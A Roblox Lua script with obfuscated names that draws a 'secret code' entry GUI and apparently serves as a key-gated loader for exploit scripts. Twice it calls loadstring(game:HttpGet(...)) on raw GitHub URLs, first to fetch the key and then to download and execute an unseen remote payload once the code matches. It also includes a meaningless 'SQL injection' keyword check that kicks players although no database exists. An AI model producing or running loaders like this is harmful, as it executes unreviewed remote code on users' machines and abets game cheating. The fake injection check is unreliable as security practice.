local qiu = Instance.new("ScreenGui")
local xrf = Instance.new("Frame")
local ytg = Instance.new("TextLabel")
local vbn = Instance.new("TextBox")
local mko = Instance.new("TextButton")
local pqr = Instance.new("TextLabel")
local stu = Instance.new("TextLabel")
local wxy = Instance.new("TextLabel")
local zbc = Instance.new("ImageLabel")

xrf.Size = UDim2.new(0, 400, 0, 250)
xrf.Position = UDim2.new(0.5, -200, 0.5, -125)
xrf.BackgroundColor3 = Color3.new(0, 0, 0)
xrf.BackgroundTransparency = 0.5
xrf.ClipsDescendants = true

zbc.Image = "http://www.roblox.com/asset/?id=5553939121"
zbc.Size = UDim2.new(0, 400, 0, 250)
zbc.Position = UDim2.new(0, 0, 0, 0)
zbc.BackgroundColor3 = Color3.new(1, 1, 1)
zbc.BackgroundTransparency = 1
zbc.Parent = xrf

ytg.Text = "Enter the secret code:"
ytg.Font = Enum.Font.SourceSans
ytg.FontSize = Enum.FontSize.Size24
ytg.TextColor3 = Color3.new(1, 1, 1)
ytg.Size = UDim2.new(0, 200, 0, 30)
ytg.Position = UDim2.new(0, 100, 0, 20)
ytg.BackgroundColor3 = Color3.new(1, 1, 1)
ytg.BackgroundTransparency = 1

vbn.Font = Enum.Font.SourceSans
vbn.FontSize = Enum.FontSize.Size24
vbn.TextColor3 = Color3.new(1, 1, 1)
vbn.Size = UDim2.new(0, 200, 0, 30)
vbn.Position = UDim2.new(0, 100, 0, 60)
vbn.BackgroundColor3 = Color3.new(1, 1, 1)
vbn.BackgroundTransparency = 1
vbn.PlaceholderText = "Type your code here..."

mko.Font = Enum.Font.SourceSans
mko.FontSize = Enum.FontSize.Size24
mko.TextColor3 = Color3.new(1, 1, 1)
mko.Text = "Submit"
mko.Size = UDim2.new(0, 100, 0, 30)
mko.Position = UDim2.new(0, 150, 0, 100)
mko.BackgroundColor3 = Color3.new(0, 1, 0)
mko.BackgroundTransparency = 0.5

pqr.Font = Enum.Font.SourceSans
pqr.FontSize = Enum.FontSize.Size18
pqr.TextColor3 = Color3.new(1, 1, 1)
pqr.Text = "Join our Discord: https://discord.com/invite/your-discord-link"
pqr.Size = UDim2.new(0, 200, 0, 20)
pqr.Position = UDim2.new(0, 100, 0, 140)
pqr.BackgroundColor3 = Color3.new(1, 1, 1)
pqr.BackgroundTransparency = 1

stu.Font = Enum.Font.SourceSans
stu.FontSize = Enum.FontSize.Size18
stu.TextColor3 = Color3.new(1, 1, 1)
stu.Text = "Created by: Feast"
stu.Size = UDim2.new(0, 200, 0, 20)
stu.Position = UDim2.new(0, 100, 0, 160)
stu.BackgroundColor3 = Color3.new(1, 1, 1)
stu.BackgroundTransparency = 1

wxy.Font = Enum.Font.SourceSans
wxy.FontSize = Enum.FontSize.Size18
wxy.TextColor3 = Color3.new(1, 1, 1)
wxy.Text = "Helper: Piercer"
wxy.Size = UDim2.new(0, 200, 0, 20)
wxy.Position = UDim2.new(0, 100, 0, 180)
wxy.BackgroundColor3 = Color3.new(1, 1, 1)
wxy.BackgroundTransparency = 1

qiu.Parent = game.Players.LocalPlayer.PlayerGui
xrf.Parent = qiu

local ajk = loadstring(game:HttpGet("https://raw.githubusercontent.com/XFeastXl/Testi/main/Testjaajdbajruxjwhdbxjs"))()
local bcd = ajk
local efg = 0

local function hij()
    efg = efg + 1
    
    if vbn.Text == "" or vbn.Text == bcd then
        if vbn.Text == bcd then
            qiu:Destroy()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/XFeastXl/Testi/main/blablablatest"))()
        else
            print("Please enter a code!")
        end
    else
        if efg >= 3 then
            game.Players.LocalPlayer:Kick("Incorrect code (max attempts reached)")
        else
            print("Incorrect code, try again!")
        end
    end

    if vbn.Text:match("%W") then
        game.Players.LocalPlayer:Kick("Suspicious activity detected")
    end

    if vbn.Text:lower():match("select") or vbn.Text:lower():match("insert") or vbn.Text:lower():match("update") or vbn.Text:lower():match("delete") then
        game.Players.LocalPlayer:Kick("SQL injection attempt detected")
    end
end

mko.MouseButton1Click:Connect(hij)

ytg.Parent = xrf
vbn.Parent = xrf
mko.Parent = xrf
pqr.Parent = xrf
stu.Parent = xrf
wxy.Parent = xrf
zbc.Parent = xrf

qiu.Enabled = true
